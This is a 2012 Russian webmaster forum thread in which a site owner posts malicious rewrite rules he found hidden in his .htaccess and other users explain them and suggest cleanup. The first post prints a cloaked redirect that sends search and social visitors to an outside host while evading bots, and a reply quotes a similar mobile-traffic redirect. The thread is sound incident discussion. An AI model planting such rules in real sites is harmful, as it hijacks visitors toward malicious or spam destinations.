Вредоносный код в .htaccess - SEO форум MaulTalk.com

Вредоносный код в .htaccess

Опции

VitaL

Topic Starter сообщение

24.8.2012, 2:38; Ответить: VitaL

Сообщение #1

Новичок

Группа: User
Сообщений: 28
Регистрация: 1.8.2010
Поблагодарили: 3 раза
Репутация:

0

Обнаружил у себя на сайте в файле .htaccess вредоносный код.

Если кто то сталкивался с этим отпишитесь, что этот код творит...

До 626 линии нет кода, после начинается следующее

<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(tweet|twit|linkedin|instagram|facebook\.|myspace\.|bebo\.|hi5\.|friendster\.|google\.|yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpile\?).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(imgres\?q).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{REMOTE_ADDR}      !^66\.249.*$ [NC]
RewriteCond %{REMOTE_ADDR}      !^74\.125.*$ [NC]
RewriteCond %{HTTP_COOKIE}      !^.*HYM.*$ [NC]
RewriteCond %{HTTP_USER_AGENT}  .*Windows.* [NC]
RewriteCond %{HTTPS}            ^off$
RewriteRule ^(.*)$              http://kaewnet.curitibacaminhoes.com/url?sa=X&source=web&cd=13&ved=0TQ4CEOow&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=2ZIhc6jI6Ka3pI2Izl0y+5e1oQ==&usg=Bc19MGKyAxuO9BYLubl0fq&sig2=QbYa6jzfQq9fhfP0lE6fJM  [R=302,L,CO=HYM:13:%{HTTP_HOST}:10766:/:0:HttpOnly]
</IfModule>
#6e70ab23e795bf66c782f69ef941fe94d2d0449dca490951bafbf4d9

0

Ответить с цитированием данного сообщения

Ответов (1 - 8)

poroch poroch 24.8.2012, 3:04; Сообщений: 226 Поблагодарили: 23 раза Репутация: 4 Просмотр профиля	24.8.2012, 3:04; Ответить: poroch Сообщение #2
Участник Группа: User Сообщений: 226 Регистрация: 23.2.2011 Поблагодарили: 23 раза Репутация: 4	было похожее, редиректило мобильный траф на левые партнерки =\

AmoSeo AmoSeo 24.8.2012, 3:21; Сообщений: 525 Поблагодарили: 131 раз Репутация: 22 Просмотр профиля	24.8.2012, 3:21; Ответить: AmoSeo Сообщение #3
Завсегдатай Группа: Active User Сообщений: 525 Регистрация: 10.6.2011 Поблагодарили: 131 раз Репутация: 22	Первым делом смените пароли на ftp, панель управления на хостинге, email. Сталкивался с подобным инородным кодом в .htaccess который после родного кода находился с большим отступом внизу. Например у меня на 296 линии начало инородного кода такое было: RewriteEngine on RewriteCond %{HTTP_USER_AGENT} (android\|midp\|j2me\|symbian\|series\ 60\|symbos\|windows\ mobile\|windows\ ce\|ppc\|smartphone\|blackberry\|mtk\|windows\ phone) [NC] RewriteCond %{HTTP_USER_AGENT} !(accoona\|ia_archiver\|antabot\|ask\ jeeves\|baidu\|dcpbot\|eltaindexer\|feedfetcher\|gamespy\|gigabot\|googlebot\|gsa-crawler\|grub-client\|gulper\|slurp\|mihalism\|msnbot\|worldindexer\|ooyyo\|pagebull\|scooter\|w3c_vali dator\|jigsaw\|webalta\|yahoofeedseeker\|yahoo!\ slurp\|mmcrawler\|yandexbot\|yandeximages\|yandexvideo\|yandexmedia\|yandexblogs\|yande xaddurl\|yandexfavicons\|yandexdirect\|yandexmetrika\|yandexcatalog\|yandexnews\|yande x imageresizer) [NC] RewriteRule (.) http://browser77.com/u/4393 [L,R=302] Возможно он стоял продолжительное время, а обнаружил когда один из пользователей пжаловался что с мобилы нельзя сайт посмотреть типо редиректит на google Почистил и сменил выше указанные пароли. Сообщение отредактировал AmoSeo* - 24.8.2012, 3:22 -------------------- Предоставляю услуги: Content Downloader - настройка парсера для любого сайта. (опыт с 2011 г.) Наполнение магазинов товарами: Opencart, SimplaCMS, Webasyst и т.д.

BestProxies BestProxies 24.8.2012, 7:20; Сообщений: 62 Поблагодарили: 8 раз Репутация: 1 Просмотр профиля	24.8.2012, 7:20; Ответить: BestProxies Сообщение #4
Частый гость Группа: User Сообщений: 62 Регистрация: 13.8.2012 Поблагодарили: 8 раз Репутация: 1	Думаю сменить пароли будет недостаточно, во-первых, на хост уже скорее всего залит веб-шелл, во вторых, этот шелл могли залить используя какую-то уязвимость (ошибку программирования), имеющуюся на сайте, так что нужно ещё найти и удалить шелл, и попытаться понять, каким образом его залили. Помочь в этом может анализ логов доступа к веб-серверу. -------------------- Best-Proxies.ru - тысячи проверенных свежих прокси, недорого Прокси проверяются на работу с Яндекс, Google, Twitter, Mail.ru и на возможность отправки почты

RageLT RageLT 24.8.2012, 8:34; Сообщений: 148 Поблагодарили: 52 раза Репутация: 14 Просмотр профиля	24.8.2012, 8:34; Ответить: RageLT Сообщение #5
Участник Группа: User Сообщений: 148 Регистрация: 1.10.2009 Поблагодарили: 52 раза Репутация: 14	Совсем недавно столкнулся с такой же проблемой. Сайты работали на joomle. У одного из них файлы имели права на исполнение, что позволяли злоумышленниками менять на всех сайтах .htaccess файлики. Скорее всего программно простукиваются сайты и дёргается определённый файл. Саму джуму не трогал, просто рекурсивно пробежался и выставил файлам правильные права, заодно и директориям. Проблема пропала. Как я понял доступ по ssh есть, вот попробуй. cd /www find . -type d -exec chmod 755 {} \; find . -type f -exec chmod 644 {} \; -------------------- Велосипед и жену не доверяй никому!

0alex1 0alex1 24.8.2012, 10:41; Сообщений: 1305 Поблагодарили: 425 раз Репутация: 63 Просмотр профиля	24.8.2012, 10:41; Ответить: 0alex1 Сообщение #6
Старожил Группа: Active User Сообщений: 1305 Регистрация: 8.7.2010 Поблагодарили: 425 раз Репутация: 63	Была не давно такая же ситуация на таймвебе. На всех сайтах, оклоо 20 шутк, не зависимо от движка в файле .htaccess появился в конце кусок кода. Редиректил на какую то гадость, но не при каждом обращении к сайту. Некоторые сайты при этом вообще перестали работать, поэтому сразу и обнаружил. Удалил эти куски и все. Было ощущение что сам сервер взломали и программно добавили во все файлы .htaccess один и тот же код вне зависимости от результата. -------------------- Взять Кредит Webmoney тут Лучшие биржи ссылок wmr1000 - Заработок в соц. сетях там

Aqaus Aqaus 24.8.2012, 11:32; Сообщений: 68 Поблагодарили: 9 раз Репутация: -1 Просмотр профиля	24.8.2012, 11:32; Ответить: Aqaus Сообщение #7
Частый гость Группа: User Сообщений: 68 Регистрация: 17.8.2009 Из: Украина Поблагодарили: 9 раз Репутация: -1	cd /www find . -type d -exec chmod 755 {} \; find . -type f -exec chmod 644 {} \ Без ssh можно admin tools сделать. Надо анализировать, через что ломали. Повторится может. -------------------- Меня и мои услуги можно найти тут Помог? Поставь плюс.

Rxp Rxp 24.8.2012, 21:36; Сообщений: 117 Поблагодарили: 21 раз Репутация: 10 Просмотр профиля	24.8.2012, 21:36; Ответить: Rxp Сообщение #8
Участник Группа: User Сообщений: 117 Регистрация: 9.11.2008 Поблагодарили: 21 раз Репутация: 10	Станлартная ситуация при взломанном сайте или хосте, обращайтесь проверим все на вирусы, сам сервак + дадим рекомендации! Сообщение отредактировал Rxp - 24.8.2012, 21:50 -------------------- Почистим сайт от вирусов, шеллов и др. -> Топик на серче -> Топик в сапе

VitaL

Topic Starter сообщение

25.8.2012, 17:32; Ответить: VitaL

Сообщение #9

Новичок

Группа: User
Сообщений: 28
Регистрация: 1.8.2010
Поблагодарили: 3 раза
Репутация:

0

Мне было интересно, что этот код делал, сайт я уже почистил. Всем спасибо за ответы.

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой

или обратитесь к любому из модераторов.

« Предыдущая тема · Программная часть · Следующая тема »

1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
Почистить код на сайте	1	Timka	1104	2.1.2021, 1:13 автор: 0pium
Вы мне код, я вам как - делать не надо.	0	fedornabilkin	956	18.9.2020, 18:59 автор: fedornabilkin
Adobe muse: Не могу разместить нужный мне код сразу после Body	0	Evg82	3832	20.6.2020, 10:24 автор: Evg82
Как перенести правила переадресации из .htaccess в php обработчик nginx?	0	KrisGuseva	2096	28.12.2019, 7:33 автор: KrisGuseva
Повесить мой код Адсенса на ваш сайт на 1-2 дня	4	WildWeb8	3725	18.7.2018, 20:04 автор: startseo